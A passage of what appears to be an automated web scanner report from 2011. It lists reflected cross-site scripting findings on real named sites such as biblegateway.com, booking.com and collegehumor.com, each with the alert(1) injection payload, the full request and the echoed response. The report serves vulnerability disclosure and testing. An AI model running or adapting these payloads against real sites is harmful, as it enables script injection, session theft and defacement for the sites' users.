6124&r_partnersitename=Beyond.com&t_pgid=446235606103476794&t_sn=/common/error/checkurl.asp&t_httph=www.beyond.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.beyond.com:80/favicon.icoe5463 style=x:expression(alert(1)) fd7a74860e&t_sgid=465502406305451416&t_ws=COLO-WEB01&t_ugid=913263227153426286&f_ip=173.193.214.243&ud=>
...[SNIP]...
6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd89"><script>alert(1)</script>b47e0ff56e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=00ab965157d8537e82c701009fe51263; path=/; domain=.biblegateway.com
Content-Length: 18832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="http://www.biblegateway.com/favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9" />
...[SNIP]...
6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6b8e--><script>alert(1)</script>f5a7c98118a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=1183588a8508212bca1abb89a6cb2a8d; path=/; domain=.biblegateway.com
Content-Length: 18834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="/favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a" />
...[SNIP]...
6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3c8"><script>alert(1)</script>54790336890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f3c8"><script>alert(1)</script>54790336890 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackplanet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Edge-control: no-store
Page-Name: /3f3c8"><script>alert(1)</script>54790336890
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d972bf5ab15e4.37665058; path=/
Cache-Control: no-cache, no-store, private
Content-Type: text/html; charset=utf-8
Content-Length: 77942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<base href="http://www.blackplanet.com/3f3c8"><script>alert(1)</script>54790336890" />
...[SNIP]...
6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f4c'-alert(1)-'19aa576003b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6f4c'-alert(1)-'19aa576003b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=gj6oi7nrchu34cjuu1pvhmt7g1; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
hEngine(
           "http://www.blurtit.com/inc/"+name+".src",
           "http://www.blurtit.com/inc/"+name+"."+ext,
           name,cat);
       
   }
   else{
       errorMsg(name,ext,cat);
   }
}
var currentPage = '/favicon.icob6f4c'-alert(1)-'19aa576003b';
//-->
...[SNIP]...
6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e95"><script>alert(1)</script>0dbcb03d99f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=3fuii4e2ro74fkn0ag29lot583; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="large_modal" script="/zone.php" return="/favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f" resource="">
...[SNIP]...
6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31d83"><script>alert(1)</script>f038581b329 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico31d83"><script>alert(1)</script>f038581b329 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.booking.com
Content-Length: 38617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                                                                                                                               
...[SNIP]...
<meta property="og:url" content="http://www.booking.com/favicon.ico31d83"><script>alert(1)</script>f038581b329" />
...[SNIP]...
6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c2b1<script>alert(1)</script>d7b417a0868 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7c2b1<script>alert(1)</script>d7b417a0868 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%3FN%3D0%26D%3Dx%26Ntt%3D7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026034; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=C8D8B00D722639114CC9D968B79ED1FF.vision1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25260

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"7c2b1<script>alert(1)</script>d7b417a0868"</span>
...[SNIP]...
6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d827'%3balert(1)//f900ae9d4e1 was submitted in the REST URL parameter 1. This input was echoed as 3d827';alert(1)//f900ae9d4e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3d827'%3balert(1)//f900ae9d4e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:45 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: lapg=%2F3d827%27%3FN%3D0%26D%3Dx%26Ntt%3D3d827%27%3Balert%281%29%2F%2Ff900ae9d4e1%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: bzid=1301753025507; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: JSESSIONID=C0D0FFA84BA2B8122526460BFC309C71.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28216

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('3d827';alert(1)//f900ae9d4e1');</script>
...[SNIP]...
6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8110a</title><script>alert(1)</script>09446e4c092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8110a</title><script>alert(1)</script>09446e4c092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%3FN%3D0%26D%3Dx%26Ntt%3D8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026723; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=985D75A4878160C26E5AC58466A0042F.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28575

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;8110a</title><script>alert(1)</script>09446e4c092&#8221;</title>
...[SNIP]...
6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0af"><script>alert(1)</script>e4e99b75a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:06 GMT
Server: Apache
Set-Cookie: lang=en; path=/
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:06 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 9848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Page You Requested Was N
...[SNIP]...
<a href="/favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76/es">
...[SNIP]...
6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13a1d<script>alert(1)</script>c642b5d4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico13a1d<script>alert(1)</script>c642b5d4bda HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 14:09:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1D6D0BAF1D692C9DD311319A3C3F0A3B; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//favicon.ico13a1d<script>alert(1)</script>c642b5d4bda</i>
...[SNIP]...
6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8cf7"><script>alert(1)</script>c187a66e885 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc8cf7"><script>alert(1)</script>c187a66e885 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colbertnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Type: text/html
Content-Length: 24243
Cache-Control: max-age=3593
Date: Sat, 02 Apr 2011 14:19:11 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <he
...[SNIP]...
<link rel="canonical" href="http://www.colbertnation.com/favicon.icoc8cf7"><script>alert(1)</script>c187a66e885" />
...[SNIP]...
6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f7f8"-alert(1)-"6131f1d2df4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1f7f8"-alert(1)-"6131f1d2df4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico1f7f8"-alert(1)-"6131f1d2df4";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico1f7f8"-alert(1
...[SNIP]...
6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 884c7'-alert(1)-'3ff612d36a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico884c7'-alert(1)-'3ff612d36a6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:07 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
)-'3ff612d36a6";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico884c7'-alert(1)-'3ff612d36a6';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvODg0YzcnLWFsZXJ0KDEpLSczZmY2MTJkMzZhNg==';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0;

...[SNIP]...
6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0e55"-alert(1)-"d509def4047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f0e55"-alert(1)-"d509def4047=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:15 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico?f0e55"-alert(1)-"d509def4047=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico?f0e55"-aler
...[SNIP]...
6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1307'-alert(1)-'314d4297df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e1307'-alert(1)-'314d4297df=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:18 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
'314d4297df=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
